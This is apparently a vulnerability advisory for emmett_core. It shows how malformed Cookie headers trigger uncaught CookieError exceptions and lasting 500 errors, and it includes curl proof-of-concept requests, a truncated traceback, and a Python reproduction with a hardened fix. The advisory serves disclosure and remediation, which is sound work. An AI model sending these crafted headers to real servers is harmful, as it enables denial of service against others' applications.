The cookies property in emmett_core.http.wrappers.Request does not handle
CookieError exceptions when parsing malformed Cookie headers. This allows
unauthenticated attackers to trigger HTTP 500 errors and cause denial of service.
Location: emmett_core/http/wrappers/__init__.py (line 64)
Vulnerable Code:
@cachedprop
def cookies(self) -> SimpleCookie:
    cookies: SimpleCookie = SimpleCookie()
    for cookie in self.headers.get("cookie", "").split(";"):
        cookies.load(cookie)  # No exception handling
    return cookies
Sending a cookie whose name contains special characters such as / ( ) { } makes SimpleCookie.load() raise a CookieError that nothing catches, so the request ends in a server error.
$ curl -w "\nTime: %{time_total}s\n" http://localhost:8000/ -H "Cookie:/security=test"
Internal error
Time: 0.024363s
After the same error has been triggered several times, the server can no longer process requests normally.
$ curl -w "\nTime: %{time_total}s\n" http://localhost:8000/ -H "Cookie:(security=test"
Internal error
Time: 60.069334s
$ curl -w "\nTime: %{time_total}s\n" http://localhost:8000/ -H "Cookie:security=test"
Internal error
Time: 60.074031s
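To make the failure reproducible without running the server, the following added example (not emmett_core's own code) replays the advisory's parsing loop against constructed Cookie values mirroring the curl requests above, and puts a hardened variant beside it that drops the fragments SimpleCookie rejects instead of failing the whole request.

```python
from http.cookies import CookieError, SimpleCookie


def parse_cookies_vulnerable(header: str) -> SimpleCookie:
    """The advisory's loop: every ';'-separated fragment goes straight into
    SimpleCookie.load(), so a CookieError propagates to the framework."""
    cookies = SimpleCookie()
    for fragment in header.split(";"):
        cookies.load(fragment)  # no exception handling
    return cookies


def parse_cookies_hardened(header: str) -> SimpleCookie:
    """Parse each fragment into a scratch jar and keep only those that
    SimpleCookie accepts; a rejected fragment is dropped, not fatal."""
    cookies = SimpleCookie()
    for fragment in header.split(";"):
        fragment = fragment.strip()
        if not fragment:
            continue
        scratch = SimpleCookie()
        try:
            scratch.load(fragment)
        except CookieError:
            # Illegal key characters such as / ( ) { } end up here.
            continue
        for name, morsel in scratch.items():
            cookies[name] = morsel
    return cookies


def cookie_values(cookies: SimpleCookie) -> dict[str, str]:
    """Plain name -> value mapping, convenient for assertions and logs."""
    return {name: morsel.value for name, morsel in cookies.items()}


def header_crashes_vulnerable(header: str) -> bool:
    """True when the unpatched loop raises, i.e. the app would answer 500."""
    try:
        parse_cookies_vulnerable(header)
    except CookieError:
        return True
    return False


if __name__ == "__main__":
    # Constructed header values mirroring the curl requests in the advisory.
    for header in ("/security=test", "(security=test", "security=test"):
        crashed = header_crashes_vulnerable(header)
        print(header, "crashes" if crashed else "ok", cookie_values(parse_cookies_hardened(header)))
```

The first two headers raise CookieError("Illegal key ...") in the unpatched loop because the key fails http.cookies' legal-character check, while the hardened parser simply returns an empty jar for them.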
Server log:
[2026-02-03 08:23:40,541] ERROR in handlers: Application exception:
Traceback (most recent call last):
File "/home/geonwoo/.local/lib/python3.13/site-packages/emmett/rsgi/handlers.py", line 70, in dynamic_handler
http = await self.router.dispatch(request, response)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/routing/router.py", line 240, in dispatch
return await match.dispatch(reqargs, response)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/routing/dispatchers.py", line 57, in dispatch
await self._parallel_flow(self.flow_open)
File...
1.3.11
CVSS v3.1 base score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)